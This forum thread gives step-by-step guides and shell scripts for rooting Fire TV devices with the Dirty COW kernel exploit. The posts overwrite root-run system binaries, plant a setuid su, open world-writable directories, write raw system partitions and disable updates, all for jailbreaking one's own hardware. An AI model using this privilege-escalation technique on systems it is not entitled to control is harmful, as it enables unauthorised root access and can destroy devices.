[GUIDE] I Rooted my Fire TV via dirtycow

Search This thread
By:
Advanced…
S

slackbladder

Senior Member
Feb 10, 2015
54
1
Hi, adam_ky,

Could you explain to me please how you managed to stop your firetv from rebooting and installing further updates please.

I was also on firmware 51.1.4.0, but stupidly forgot to pull the plug on my firetv when i had an upgrade from my isp, and my dns got changed.
this allowed my unit to update to 51.1.6.3, at the time there were no other updates so I quickly put in the opendns server details to my router and no more updates.

I would like to get this 1st gen rooted but I believe it has the efuse problem.

could you please let me know what you did,.... would be really helpful if you could..
cheers..
slackbladder.
 
T

tehlers

Senior Member
Aug 8, 2015
84
53
OnePlus One
OnePlus 5
Fire TV Stick 5.2.1.1 rootable with dirtycow

Hello,

I just can confirm, that Fire TV Stick (montoya) on version 5.2.1.1 is rootable through dirtycow. It actually took me 5 days of research and trying. I'll not post a step by step howto, but some hints. At first you compile the dirtycow.c with toolchain for android and you need the su binary from SuperSU. You will notice, that root in nearly all selinux contexts can't read emulated sdcard, nor /data/local/tmp, while shell user can only write to these locations. So already data exchange between shell and root is very problematic. But of course you can use dirtycow, but only for small files.

Here are the hints:

  • /system/bin/watchdogd is started as root in context init. It can remount /system (but cannot write to any directory in /system) and read/write raw devices.
  • Exchange /system/bin/vcdbg (it's fairly big) with su. This can be used to start su in the exchanged watchdogd shell Script, like:

Code: 
#!/system/bin/sh
/system/bin/vcdbg -ad

Reboot, now you can use "vcdbg -c <command>", e.g. test it with "vcdbg -c id". Then do something like:
Code: 
vcdbg -c mkdir /data/tmp
vcdbg -c chmod 777 /data/tmp
vcdbg -c dd if=/dev/block/platform/sdhci.1/by-name/system of=/data/tmp/system.img
vcdbg -c chmod 777 /data/tmp/system.img
vcdbg -c chmod 777 /data
cp -a /data/tmp/system.img /data/local/tmp/system.img

And
Code: 
adb pull /data/local/tmp/system.img
Then loop-mount the image in your computer, add su, supolicy, libsupol.so and SuperSU.apk (you see files and needed locations in the pre-rooted images). Also watch out for the default contexts these files need to be in (u:eek:bject_r:system_file:s0). If you have a linux without active selinux, copy an existing file, e.g.:

Code: 
/root/temp/mount/system/bin # ls -laZ ip
-rwxr-xr-x 1 root 2000 u:object_r:system_file:s0 165484  6. Aug 2016  ip
/root/temp/mount/system/bin # cp -a ip su
/root/temp/mount/system/bin # cat /root/SuperSU/su > su
/root/temp/mount/system/bin # ls -laZ su
-rwxr-xr-x 1 root 2000 u:object_r:system_file:s0 75364  5. Aug 2017  su

push back the file to /data/local/tmp/system.img. Now you need to find a way to get this file readable for root. I did that like this:

Code: 
cat /data/local/tmp/system.img | vcdbg -c 'echo "$(cat)" > /data/tmp/system.img'
Now check size and write everything back with dd:

Code: 
ls -la /data/tmp/system.img
vcdbg -c dd if=/data/tmp/system.img of=/dev/block/platform/sdhci.1/by-name/system

Reboot and you are fully root. :) Afterwards you can install TWRP and install latest pre-root image.

Best

Tim
 
Last edited:
  • Like
Reactions: RagManX, sumwong, puppinoo and 1 other person
S

sumwong

Member
Jul 11, 2012
6
1
tehlers said:
I just can confirm, that Fire TV Stick (montoya) on version 5.2.1.1 is rootable through dirtycow. It actually took me 5 days of research and trying. I'll not post a step by step howto, but some hints. At first you compile the dirtycow.c with toolchain for android and you need the su binary from SuperSU.

  • /system/bin/watchdogd is started as root in context init. It can remount /system (but cannot write to any directory in /system) and read/write raw devices.
  • Exchange /system/bin/vcdbg (it's fairly big) with su. This can be used to start su in the exchanged watchdogd shell Script, like:
Click to expand...
Click to collapse

@tehlers: thank you for this! Maybe you can help me on my 5.2.1.1 montoya. I compiled dirtycow (timwr/CVE-2016-5195) for android21/armeabi-v7a and pushed it to the stick. Running it on /system/bin/watchdogd and /system/bin/vcdbg does nothing unfortunately. There are no changes to the files, no matter what I do. I tried a few pre-compiled binaries for dirtycow from this thread and still no changes. I'm fairly new to this. Any chance you could point me into the right direction?
 
T

tehlers

Senior Member
Aug 8, 2015
84
53
OnePlus One
OnePlus 5
Hi,

sumwong said:
@tehlers: thank you for this! Maybe you can help me on my 5.2.1.1 montoya. I compiled dirtycow (timwr/CVE-2016-5195) for android21/armeabi-v7a and pushed it to the stick. Running it on /system/bin/watchdogd and /system/bin/vcdbg does nothing unfortunately. There are no changes to the files, no matter what I do. I tried a few pre-compiled binaries for dirtycow from this thread and still no changes. I'm fairly new to this. Any chance you could point me into the right direction?
Click to expand...
Click to collapse

I'll try. :)

At first: I used exactly the same implementation of dirtycow. You need to pay attention, that you (in contrast to the other dirtycow implementations) give as arguments "./dirtycow src dst", instead of "./dirtycow dst src".

Second thing is, that it only works for a few bytes, and not always. But since it checks what bytes still actually differ, you can go further with every next round. I wrote something like this:

Code: 
exit=1; while [ "$exit" != "0" ]; do ./dirtycow /data/local/tmp/watchdogd_new.txt /system/bin/watchdogd; exit=$?; echo $exit; done

You should first try it with e.g. /system/etc/hosts, exchange "127.0.0.1" with e.g. "127.0.0.2", this should go fast (but does not need to work in the first round).

I may also note that I made the shellscripts always exactly as big as the original binary (and always saved the original binary in /data/local/tmp "cp -a /system/bin/watchdogd /data/local/tmp/" before doing anything). So let's say (this is from current firmware, not 5.2.1.1):

Code: 
shell@montoya:/data/local/tmp $ ls -la /system/bin/watchdogd                   
-rwxr-xr-x root     shell        5288 2017-06-10 01:45 watchdogd

And you now have a shellscript "watchdogd_new.txt" (this is on my computer, "bc" is not part of the firmware; but the rest would also work in the stick):

Code: 
> ls -la watchdogd_new.txt
-rw-r--r-- 1 root root 39 Aug 12 19:29 watchdogd_new.txt
> echo "5288-39" | bc
5249
> i=0; while [ "$i" != "5249" ]; do echo >> watchdogd_new.txt; let i=$i+1; done
> ls -la watchdogd_new.txt
-rw-r--r-- 1 root root 5288 Aug 12 19:31 watchdogd_new.txt

And last thing I would like to note: When finally exchanged everything of the binary and you want to reboot. You should first play a video from e.g. Amazon Video and skip around a bit. That has the effect, that the kernel syncs dirty caches to flash, because it needs the memory for playing the video and caching it. Since you poke with dirtycow something in the cache, a "sync" does not synchronize this to disk (or flash in this case).

I hope this helps.

Best

Tim
 
  • Like
Reactions: sumwong
S

sumwong

Member
Jul 11, 2012
6
1
tehlers said:
I hope this helps.
Click to expand...
Click to collapse

Yup! I had tried so many versions of dirtcow that my script called it with paramters in the wrong order. Also I hadn't read up on the exact mechanics of dirtcow so changes to the files were incomplete, exactly like you pointed out, probably because I just rebooted directly after dirtcow finished successfully. I am now in the process of pulling the system image and will report back if all goes well. Seems straight forward from here. Thanks again for the great work and for saving me all those hours of work!
 
S

sumwong

Member
Jul 11, 2012
6
1
Thanks again to @tehlers for sharing this great work. I had some issues in the process mainly with dirtycow being unstable / mixing up versions of dirtycow but overall this worked like a charm.
I am leaving the files I used and my notes here. I completed those from memory so I might have mixed some things up. I worked on ubuntu and had temporary files in /root/.

Code: 
#local

# make sure you activated usb debugging in settings, then connect to your firetv
adb connect 192.168.x.x

# push working files to firetv
# use attached dirtycow for montoya or compile it yourself, using NDK for armeabi-v7a/android-22:
# Makefile build section should read: 
# ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-22

adb push /root/su /data/local/tmp
adb push /root/watchdogd_script /data/local/tmp
adb push /root/dirtycow /data/local/tmp

adb shell

#-----------
#aftv

ls -la /system/bin/vcdbg
# 370380 in my case

ls -la /data/local/tmp/su
# 75348 in my case

# pad su to the size of vcdbg (size_of_vcdbg-size_of_su = 295032)
i=0; while [ "$i" != "295032" ]; do echo >> /data/local/tmp/su; let i=$i+1; done
ls -la /data/local/tmp/su

ls -la /system/bin/watchdogd 
# 5288 in my case

ls -la /data/local/tmp/watchdogd_script
# 39 in my case

# pad watchdogd
i=0; while [ "$i" != "5249" ]; do echo >> /data/local/tmp/watchdogd_script; let i=$i+1; done
ls -la /data/local/tmp/watchdogd_script

# exchange watchdogd
exit=1; while [ "$exit" != "0" ]; do /data/local/tmp/dirtycow /data/local/tmp/watchdogd_script /system/bin/watchdogd; exit=$?; echo $exit; done

# exchange vcdbg
exit=1; while [ "$exit" != "0" ]; do /data/local/tmp/dirtycow /data/local/tmp/su /system/bin/vcdbg; exit=$?; echo $exit; done

# surf around a little, watch videos for the system to dump changes

# make sure the changes were applied (should return "root")
vcdbg -c id

# reboot the system
reboot

#reconnect
adb connect 192.168.x.x
adb shell

# dump system to shell accessible system.img
vcdbg -c mkdir /data/tmp
vcdbg -c chmod 777 /data/tmp
vcdbg -c dd if=/dev/block/platform/sdhci.1/by-name/system of=/data/tmp/system.img
vcdbg -c chmod 777 /data/tmp/system.img
vcdbg -c chmod 777 /data
cp -a /data/tmp/system.img /data/local/tmp/system.img

#-----------
#local

# now we pull the system.img to our local system
cd /root
adb pull /data/local/tmp/system.img
# 824180736 bytes in my case

# not sure if all paths correct, writing this down from memory
cd mount
mkdir system
mount ../system.img ./system/
cd system/xbin

# using existing files to make sure context is correct
cp -a trapz su
cp -a trapz supolicy
cp -a trapz libsupol.so
cat /root/su/su > su
cat /root/su/libsupol.so > libsupol.so
cat /root/su/supolicy > supolicy
cd ../app
cp -aR PicoTts SuperSU
cd SuperSU/
mv PicoTts.apk SuperSU.apk
rm -rf arm
rm -rf lib
cat /root/su/SuperSU/SuperSU.apk > SuperSU.apk
cp SuperSU.apk ../
adb push system.img /data/local/tmp/

#-----------
#aftv

# cat system.img to root accessible place
cat /data/local/tmp/system.img | vcdbg -c 'echo "$(cat)" > /data/tmp/system.img'
# double check file size 
ls -la /data/tmp/system.img
# and write back
vcdbg -c dd if=/data/tmp/system.img of=/dev/block/platform/sdhci.1/by-name/system

# just to make sure, deactivate ota service and remove banner ad while we're here
adb shell pm hide com.amazon.device.software.ota
pm uninstall -k --user 0 com.amazon.kso.blackbird

reboot
 

Attachments

  • dirtycow-5.2.1.1-montoya.zip
    2.6 MB · Views: 99
Last edited:
T

tehlers

Senior Member
Aug 8, 2015
84
53
OnePlus One
OnePlus 5
Dear all,

upon request, I tried to make things easier with a bundle of files and scripts you can run on the Fire TV Stick 5.2.1.1. I will take no responsibility if your stick bricks! I have prepared the system.img with TWRP and su.

Here are the following files:

Code: 
Archive:  auto-root-fireos-5.2.1.1.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2017-08-23 15:25   auto-root-fireos-5.2.1.1/
     1565  2017-08-23 15:15   auto-root-fireos-5.2.1.1/run_me2.sh
     5288  2017-08-13 19:09   auto-root-fireos-5.2.1.1/watchdogd_new.txt
   370380  2017-08-05 14:57   auto-root-fireos-5.2.1.1/vcdbg_new.txt
     5400  2017-07-31 22:30   auto-root-fireos-5.2.1.1/dirtycow
     1351  2017-08-14 20:25   auto-root-fireos-5.2.1.1/run_me.sh
824180736  2017-08-13 20:31   auto-root-fireos-5.2.1.1/system-5.2.1.1-root-recovery.img
     1838  2017-08-23 15:25   auto-root-fireos-5.2.1.1/run_me3.sh
---------                     -------
824566558                     8 files

https://www.androidfilehost.com/?fid=673368273298980527

At first you put the whole directory into /data/local/tmp:

Code: 
> adb push auto-root-fireos-5.2.1.1 /data/local/tmp/auto-root-fireos-5.2.1.1

Then you go into this directory and make sure the permissions are right:
Code: 
> adb shell
shell@montoya:/ $ cd /data/local/tmp/auto-root-fireos-5.2.1.1
shell@montoya:/data/local/tmp/auto-root-fireos-5.2.1.1 $ chmod 755 dirtycow run_me.sh run_me2.sh

You start "./run_me.sh":

Code: 
#!/system/bin/sh

echo "Please only run on FireTV Stick 1 (montoya), otherwise you will brick the device."
echo "Press enter to continue, or ctrl+c to cancel."
read

if [ "$(grep '^ro.build.version.fireos=5.2.1.1' /system/build.prop)" = "" ]; then
  echo "Please run only on FireOS 5.2.1.1"
  exit 1
fi

if [ "$(pwd)" != "/data/local/tmp/auto-root-fireos-5.2.1.1" ]; then
  echo "Please put everything from zip-file to /data/local/tmp/auto-root-fireos-5.2.1.1 and run script there"
  exit 1
fi

echo "Saving watchdogd to /data/local/tmp/."
cp -a /system/bin/watchdogd /data/local/tmp/

echo "Saving vcdbg to /data/local/tmp/."
cp -a /system/bin/vcdbg /data/local/tmp/

echo "Now exchanging content of /system/bin/watchdogd"
exit=1; while [ "$exit" != "0" ]; do ./dirtycow /data/local/tmp/auto-root-fireos-5.2.1.1/watchdogd_new.txt /system/bin/watchdogd; exit=$?; echo $exit; done
echo "Successful."

echo "Now exchanging content of /system/bin/vcdbg"
exit=1; while [ "$exit" != "0" ]; do ./dirtycow /data/local/tmp/auto-root-fireos-5.2.1.1/vcdbg_new.txt /system/bin/vcdbg; exit=$?; echo $exit; done
echo "Successful."

echo "Now play a video on Amazon Prime Video and skip a bit around to make changes persistent"
echo "Then press enter"
read

echo "Now we reboot, afterwards please run run_me2.sh in /data/local/tmp/auto-root-fireos-5.2.1.1."
reboot

for the first part, exchanging the binaries and becoming root. The more dangerous part is "./run_me2.sh" which exchanges the whole /system with my prepared version:


Code: 
#!/system/bin/sh

echo "Please only run on FireTV Stick 1 (montoya), otherwise you will brick the device."
echo "Press enter to continue, or ctrl+c to cancel."
read

if [ "$(grep '^ro.build.version.fireos=5.2.1.1' /system/build.prop)" = "" ]; then
  echo "Please run only on FireOS 5.2.1.1"
  exit 1
fi

if [ "$(pwd)" != "/data/local/tmp/auto-root-fireos-5.2.1.1" ]; then
  echo "Please put everything from zip-file to /data/local/tmp/auto-root-fireos-5.2.1.1 and run script there"
  exit 1
fi

if [ "$(vcdbg -c id | grep 'uid=0(root) gid=0(root) context=u:r:init_shell:s0')" = "" ]; then
  echo "Step 1 (run_me.sh) went wrong, please try again"
  exit 1
fi

echo "Now copying system.img to /data/tmp"
vcdbg -c mkdir /data/tmp
vcdbg -c chmod 777 /data
vcdbg -c chmod 777 /data/tmp
cat /data/local/tmp/auto-root-fireos-5.2.1.1/system-5.2.1.1-root-recovery.img | vcdbg -c 'dd of=/data/tmp/system.img'
vcdbg -c chmod 777 /data/tmp/system.img

echo "Checking md5sum, please be patient."
if [ "`md5 /data/tmp/system.img | (read a b; echo $a)`" != "7f487939edb80ec87c4784943d6154fe" ]; then
  echo "system.img could not be fully copied, exiting"
  exit 1
fi
echo "Success"

echo "Now dd into real device, please do not interrupt"
vcdbg -c dd if=/data/tmp/system.img of=/dev/block/platform/sdhci.1/by-name/system
sync
echo "Success"

echo "Now we wait for 30 seconds to be sure that everything is written to flash"
sleep 30

#echo "Now we reboot, afterwards you should have TWRP and full root."
#reboot
echo "Now run run_me3.sh to check md5 of new files, or just reboot."


For security, check md5sums of files before reboot:


Code: 
#!/system/bin/sh

echo "Please only run on FireTV Stick 1 (montoya), otherwise you will brick the device."
echo "Press enter to continue, or ctrl+c to cancel."
read

if [ "$(grep '^ro.build.version.fireos=5.2.1.1' /system/build.prop)" = "" ]; then
  echo "Please run only on FireOS 5.2.1.1"
  exit 1
fi

if [ "$(pwd)" != "/data/local/tmp/auto-root-fireos-5.2.1.1" ]; then
  echo "Please put everything from zip-file to /data/local/tmp/auto-root-fireos-5.2.1.1 and run script there"
  exit 1
fi

if [ "$(vcdbg -c id | grep 'uid=0(root) gid=0(root) context=u:r:init_shell:s0')" = "" ]; then
  echo "Step 1 (run_me.sh) went wrong, please try again"
  exit 1
fi

if [ ! -d /system/recovery ]; then
  echo "/system/recovery does not exist, exiting"
  exit 1
fi

echo "Checking md5sum of /system/recovery/2ndinit, please be patient."
if [ "`md5 /system/recovery/2ndinit | (read a b; echo $a)`" != "2dae0315ee0b7704215d8d538c168a58" ]; then
  echo "/system/recovery/2ndinit is not fully ok, exiting"
  exit 1
fi
echo "Success, /system/recovery/2ndinit is ok."

echo "Checking md5sum of /system/recovery/2ndinitstub, please be patient."
if [ "`md5 /system/recovery/2ndinitstub | (read a b; echo $a)`" != "43069eea7d009c0a86b87ceef60116fd" ]; then   
  echo "/system/recovery/2ndinitstub is not fully ok, exiting"          
  exit 1  
fi    
echo "Success, /system/recovery/2ndinitstub is ok."

echo "Checking md5sum of /system/recovery/ramdisk-recovery.cpio.lzma, please be patient."
if [ "`md5 /system/recovery/ramdisk-recovery.cpio.lzma | (read a b; echo $a)`" != "3dcb1af64bd7d2e7aed616e4a5328497" ]; then   
  echo "/system/recovery/ramdisk-recovery.cpio.lzma is not fully ok, exiting"          
  exit 1  
fi    
echo "Success, /system/recovery/ramdisk-recovery.cpio.lzma is ok."    

sync

echo "Now you can reboot, TWRP files are all ok."


Again: I'll take no responsibility for any damage caused. I have prepared everything to the best of my knowledge. If you use it and succeed (or fail), please report back here.

Best

Tim

EDIT: Updated to newest version, if you have problems with copying data to /data/tmp (in run_me2.sh), it might be worthwhile to test over network (not via USB) and use adb from a linux system.

EDIT2: Upon request the hint from the later pages: Instead of playing a video to sync changes to flash (short before the first script finishes, it seems to be more effective to fill the memory with artificial content until completely full. This can be done with a memory filling App, see https://xdaforums.com/showpost.php?p=73766497&postcount=157 and https://xdaforums.com/showpost.php?p=73838299&postcount=163.
 
Last edited:
  • Like
Reactions: Fischfuss, codebot, tak437 and 11 others
S

Spider1996

Senior Member
Dec 24, 2011
124
26
Google Nexus 10
OnePlus One
tehlers said:
[...]
Then you go into this directory:
Code: 
> adb shell
shell@montoya:/ $ cd /data/local/tmp/auto-root-fireos-5.2.1.1

You start "./run_me.sh":
[...]
Click to expand...
Click to collapse

All files are in that folder (I listed them with ls -R). While running ./run_me.sh, the adb shell only returns a "./run_me.sh: can't execute: Permission denied"

Thanks for your work anyway. :)
 
Last edited:
T

tehlers

Senior Member
Aug 8, 2015
84
53
OnePlus One
OnePlus 5
Hi,

Spider1996 said:
yeah, currently I use Windows. Got a Linux System here too if needed. Does it make any difference? I execute the script right in the shell.
Click to expand...
Click to collapse

on a linux system the permissions would have been correctly unzipped and transferred. The rest should be the same for windows or linux, just do "chmod 755 dirtycow run_me.sh run_me2.sh" in the directory on the stick.

Best Tim
 
  • Like
Reactions: Spider1996
S

Spider1996

Senior Member
Dec 24, 2011
124
26
Google Nexus 10
OnePlus One
tehlers said:
Hi,



on a linux system the permissions would have been correctly unzipped and transferred. The rest should be the same for windows or linux, just do "chmod 755 dirtycow run_me.sh run_me2.sh" in the directory on the stick.

Best Tim
Click to expand...
Click to collapse

Now it keeps repeating the attached message
 

Attachments

  • cmd.png
    cmd.png
    12.8 KB · Views: 265
Last edited:
S

Spider1996

Senior Member
Dec 24, 2011
124
26
Google Nexus 10
OnePlus One
tehlers said:
looks good, let it keep doing dirtycow. :)

EDIT: You are currently in the state, where I said: "Second thing is, that it only works for a few bytes, and not always. But since it checks what bytes still actually differ, you can go further with every next round."
Click to expand...
Click to collapse

Okay, after that is done, I see I have to play a prime video or something like that. How to do that without Wifi connection? If I connect, the Stick wants to update I think. (Still waiting for Dirtycow to end the second process now.)
 
T

tehlers

Senior Member
Aug 8, 2015
84
53
OnePlus One
OnePlus 5
Spider1996 said:
Okay, after that is done, I see I have to play a prime video or something like that. How to do that without Wifi connection? If I connect, the Stick wants to update I think. (Still waiting for Dirtycow to end the second process now.)
Click to expand...
Click to collapse

mhh, yeah I have disabled the update domains in my nameserver, so I could use the stick. I think what sumwong wrote
sumwong said:
"pm hide com.amazon.device.software.ota"
Click to expand...
Click to collapse
should disable updates (or maybe "pm uninstall -k --user 0 com.amazon.device.software.ota"). Maybe for this case someone else with experience on that could help?
 
S

Spider1996

Senior Member
Dec 24, 2011
124
26
Google Nexus 10
OnePlus One
tehlers said:
mhh, yeah I have disabled the update domains in my nameserver, so I could use the stick. I think what sumwong wrote

should disable updates (or maybe "pm uninstall -k --user 0 com.amazon.device.software.ota"). Maybe for this case someone else with experience on that could help?
Click to expand...
Click to collapse

I read somewhere, thats only possible on rooted devices. Do I need to play something from Amazon Prime? Maybe it is possible to push a video to the device and a file explorer app?

Edit: Now it asks for that prime video. It is possible to block this: http://www.aftvnews.com/how-to-block-software-updates-on-the-amazon-fire-tv-or-fire-tv-stick/#router
 
Last edited:
T

tehlers

Senior Member
Aug 8, 2015
84
53
OnePlus One
OnePlus 5
Spider1996 said:
I read somewhere, thats only possible on rooted devices. Do I need to play something from Amazon Prime? Maybe it is possible to push a video to the device and a file explorer app?
Click to expand...
Click to collapse

you just need to allocate memory, that the stick is writing the changes on flash. It may already work by pushing a large file in /sdcard or /data/local/tmp (and delete it afterwards). If you want to try if you poked around enough, you can try to reboot and check with "vcdbg -c id". If this command gives you "uid=0(root) gid=0(root) context=u:r:init:s0", then everything has worked, otherwise start over with "./run_me.sh".

If you want to keep the original contents of the binaries watchdogd and vcdbg, save them from /data/local/tmp/ before starting over, because my script will overwrite them with every call of "./run_me.sh" and they may have already changed a few bytes.

Best
 
S

Spider1996

Senior Member
Dec 24, 2011
124
26
Google Nexus 10
OnePlus One
okay blocked everythying in Method 3. No Amazon Service, but YouTube works/was possible to download. So playing some Videos from there....

So it's late in germany now and vcdbg -c id gave me "Segmentation fault". Trying again tomorrow
 
You must log in or register to reply here.

Similar threads

M
Configure IPTV on your FIre TV and watch Live TV
Replies
521
Views
461K
O
Olga9090
M
Amazon Fire TV
Replies
520
Views
311K
L
lukkingsing
G
List of Tested Sideloaded APKs for the Amazon Fire TV (Fire TV Stick)
Replies
307
Views
278K
G
GuestK00326
S
[GUIDE] Hardware root via emmc chip (requires soldering!)
Replies
577
Views
255K
N
navin23
burcbuluklu
[Guide] [ROM] (mantis) Fire TV Stick 4K Prerooted Android TV Rom (6.2.7.6)
Replies
259
Views
133K
B
bloxycola

Top Liked Posts

24 Hours All time
  • There are no posts matching your filters.
  • 21
    C
    christofsteel
    Hi,

    i just rooted my Fire TV 1 (version 51.1.4.0) via dirtycow, and I wanted to share my experience. (Unfortunately I cannot post external Links here)

    Dirtycow allows you to write to files, even if you have no permission to do so. Unfortunately there is no binary on the system with the suid bit set, so I could not replace this binary. (Other attempts on other Android devices replaced the run-as binary. This is not possible here). Another problem was, that the modification only last for the current boot, so I could not just modify boot scripts. I had to find a binary, that is executed as root while the system is running, preferably on demand. This binary is ip. Every time one modifies the network settings in the Fire TV gui, ip is executed as root. Yay. With that in mind, I replaced ip with a shell script, that deploys the su binary.

    This is what I did:
    1. I compiled the dirtycow.c from timwr GitHub Repository CVE-2016-5195
    2. Then I put the resulting binary into /data/local/tmp on my Firetv (via adb)
    3. Now I pushed chainfires su binary to /data/local/tmp
    4. I copied the /system/bin/ip binary to /data/local/tmp
    5. I wrote this shell script, pushed it to /data/local/tmp and marked it executable (755)
      Code: 
      #!/system/bin/sh
mount -o remount,rw /system
cp /data/local/tmp/su /system/xbin
chmod 4755 /system/xbin/su    
/data/local/tmp/ip "$@"
    6. After that, I used dirtycow to replace ip with my new ip script (./dirtycow /system/bin/ip ip_script) [This may take a while]
    7. Now I went to my network settings of my Fire TV and changed them to a static ip address.
    8. I reconnected to my amazon Fire tv and typed su
      Code: 
      shell@android:/ $ su
root@android:/ #
    9. Lastly I installed the Supersu.apk from chainfire

    Root seems to work with the adb shell and the terminal app. Somehow it does not with amaze file manager. If I start it I get thrown into the amazon fire ui.

    This rooting method should also work for other versions of the fireOS, though I have not tested them.
    View
    14
    T
    tehlers
    Dear all,

    upon request, I tried to make things easier with a bundle of files and scripts you can run on the Fire TV Stick 5.2.1.1. I will take no responsibility if your stick bricks! I have prepared the system.img with TWRP and su.

    Here are the following files:

    Code: 
    Archive:  auto-root-fireos-5.2.1.1.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2017-08-23 15:25   auto-root-fireos-5.2.1.1/
     1565  2017-08-23 15:15   auto-root-fireos-5.2.1.1/run_me2.sh
     5288  2017-08-13 19:09   auto-root-fireos-5.2.1.1/watchdogd_new.txt
   370380  2017-08-05 14:57   auto-root-fireos-5.2.1.1/vcdbg_new.txt
     5400  2017-07-31 22:30   auto-root-fireos-5.2.1.1/dirtycow
     1351  2017-08-14 20:25   auto-root-fireos-5.2.1.1/run_me.sh
824180736  2017-08-13 20:31   auto-root-fireos-5.2.1.1/system-5.2.1.1-root-recovery.img
     1838  2017-08-23 15:25   auto-root-fireos-5.2.1.1/run_me3.sh
---------                     -------
824566558                     8 files

    https://www.androidfilehost.com/?fid=673368273298980527

    At first you put the whole directory into /data/local/tmp:

    Code: 
    > adb push auto-root-fireos-5.2.1.1 /data/local/tmp/auto-root-fireos-5.2.1.1

    Then you go into this directory and make sure the permissions are right:
    Code: 
    > adb shell
shell@montoya:/ $ cd /data/local/tmp/auto-root-fireos-5.2.1.1
shell@montoya:/data/local/tmp/auto-root-fireos-5.2.1.1 $ chmod 755 dirtycow run_me.sh run_me2.sh

    You start "./run_me.sh":

    Code: 
    #!/system/bin/sh

echo "Please only run on FireTV Stick 1 (montoya), otherwise you will brick the device."
echo "Press enter to continue, or ctrl+c to cancel."
read

if [ "$(grep '^ro.build.version.fireos=5.2.1.1' /system/build.prop)" = "" ]; then
  echo "Please run only on FireOS 5.2.1.1"
  exit 1
fi

if [ "$(pwd)" != "/data/local/tmp/auto-root-fireos-5.2.1.1" ]; then
  echo "Please put everything from zip-file to /data/local/tmp/auto-root-fireos-5.2.1.1 and run script there"
  exit 1
fi

echo "Saving watchdogd to /data/local/tmp/."
cp -a /system/bin/watchdogd /data/local/tmp/

echo "Saving vcdbg to /data/local/tmp/."
cp -a /system/bin/vcdbg /data/local/tmp/

echo "Now exchanging content of /system/bin/watchdogd"
exit=1; while [ "$exit" != "0" ]; do ./dirtycow /data/local/tmp/auto-root-fireos-5.2.1.1/watchdogd_new.txt /system/bin/watchdogd; exit=$?; echo $exit; done
echo "Successful."

echo "Now exchanging content of /system/bin/vcdbg"
exit=1; while [ "$exit" != "0" ]; do ./dirtycow /data/local/tmp/auto-root-fireos-5.2.1.1/vcdbg_new.txt /system/bin/vcdbg; exit=$?; echo $exit; done
echo "Successful."

echo "Now play a video on Amazon Prime Video and skip a bit around to make changes persistent"
echo "Then press enter"
read

echo "Now we reboot, afterwards please run run_me2.sh in /data/local/tmp/auto-root-fireos-5.2.1.1."
reboot

    for the first part, exchanging the binaries and becoming root. The more dangerous part is "./run_me2.sh" which exchanges the whole /system with my prepared version:


    Code: 
    #!/system/bin/sh

echo "Please only run on FireTV Stick 1 (montoya), otherwise you will brick the device."
echo "Press enter to continue, or ctrl+c to cancel."
read

if [ "$(grep '^ro.build.version.fireos=5.2.1.1' /system/build.prop)" = "" ]; then
  echo "Please run only on FireOS 5.2.1.1"
  exit 1
fi

if [ "$(pwd)" != "/data/local/tmp/auto-root-fireos-5.2.1.1" ]; then
  echo "Please put everything from zip-file to /data/local/tmp/auto-root-fireos-5.2.1.1 and run script there"
  exit 1
fi

if [ "$(vcdbg -c id | grep 'uid=0(root) gid=0(root) context=u:r:init_shell:s0')" = "" ]; then
  echo "Step 1 (run_me.sh) went wrong, please try again"
  exit 1
fi

echo "Now copying system.img to /data/tmp"
vcdbg -c mkdir /data/tmp
vcdbg -c chmod 777 /data
vcdbg -c chmod 777 /data/tmp
cat /data/local/tmp/auto-root-fireos-5.2.1.1/system-5.2.1.1-root-recovery.img | vcdbg -c 'dd of=/data/tmp/system.img'
vcdbg -c chmod 777 /data/tmp/system.img

echo "Checking md5sum, please be patient."
if [ "`md5 /data/tmp/system.img | (read a b; echo $a)`" != "7f487939edb80ec87c4784943d6154fe" ]; then
  echo "system.img could not be fully copied, exiting"
  exit 1
fi
echo "Success"

echo "Now dd into real device, please do not interrupt"
vcdbg -c dd if=/data/tmp/system.img of=/dev/block/platform/sdhci.1/by-name/system
sync
echo "Success"

echo "Now we wait for 30 seconds to be sure that everything is written to flash"
sleep 30

#echo "Now we reboot, afterwards you should have TWRP and full root."
#reboot
echo "Now run run_me3.sh to check md5 of new files, or just reboot."


    For security, check md5sums of files before reboot:


    Code: 
    #!/system/bin/sh

echo "Please only run on FireTV Stick 1 (montoya), otherwise you will brick the device."
echo "Press enter to continue, or ctrl+c to cancel."
read

if [ "$(grep '^ro.build.version.fireos=5.2.1.1' /system/build.prop)" = "" ]; then
  echo "Please run only on FireOS 5.2.1.1"
  exit 1
fi

if [ "$(pwd)" != "/data/local/tmp/auto-root-fireos-5.2.1.1" ]; then
  echo "Please put everything from zip-file to /data/local/tmp/auto-root-fireos-5.2.1.1 and run script there"
  exit 1
fi

if [ "$(vcdbg -c id | grep 'uid=0(root) gid=0(root) context=u:r:init_shell:s0')" = "" ]; then
  echo "Step 1 (run_me.sh) went wrong, please try again"
  exit 1
fi

if [ ! -d /system/recovery ]; then
  echo "/system/recovery does not exist, exiting"
  exit 1
fi

echo "Checking md5sum of /system/recovery/2ndinit, please be patient."
if [ "`md5 /system/recovery/2ndinit | (read a b; echo $a)`" != "2dae0315ee0b7704215d8d538c168a58" ]; then
  echo "/system/recovery/2ndinit is not fully ok, exiting"
  exit 1
fi
echo "Success, /system/recovery/2ndinit is ok."

echo "Checking md5sum of /system/recovery/2ndinitstub, please be patient."
if [ "`md5 /system/recovery/2ndinitstub | (read a b; echo $a)`" != "43069eea7d009c0a86b87ceef60116fd" ]; then   
  echo "/system/recovery/2ndinitstub is not fully ok, exiting"          
  exit 1  
fi    
echo "Success, /system/recovery/2ndinitstub is ok."

echo "Checking md5sum of /system/recovery/ramdisk-recovery.cpio.lzma, please be patient."
if [ "`md5 /system/recovery/ramdisk-recovery.cpio.lzma | (read a b; echo $a)`" != "3dcb1af64bd7d2e7aed616e4a5328497" ]; then   
  echo "/system/recovery/ramdisk-recovery.cpio.lzma is not fully ok, exiting"          
  exit 1  
fi    
echo "Success, /system/recovery/ramdisk-recovery.cpio.lzma is ok."    

sync

echo "Now you can reboot, TWRP files are all ok."


    Again: I'll take no responsibility for any damage caused. I have prepared everything to the best of my knowledge. If you use it and succeed (or fail), please report back here.

    Best

    Tim

    EDIT: Updated to newest version, if you have problems with copying data to /data/tmp (in run_me2.sh), it might be worthwhile to test over network (not via USB) and use adb from a linux system.

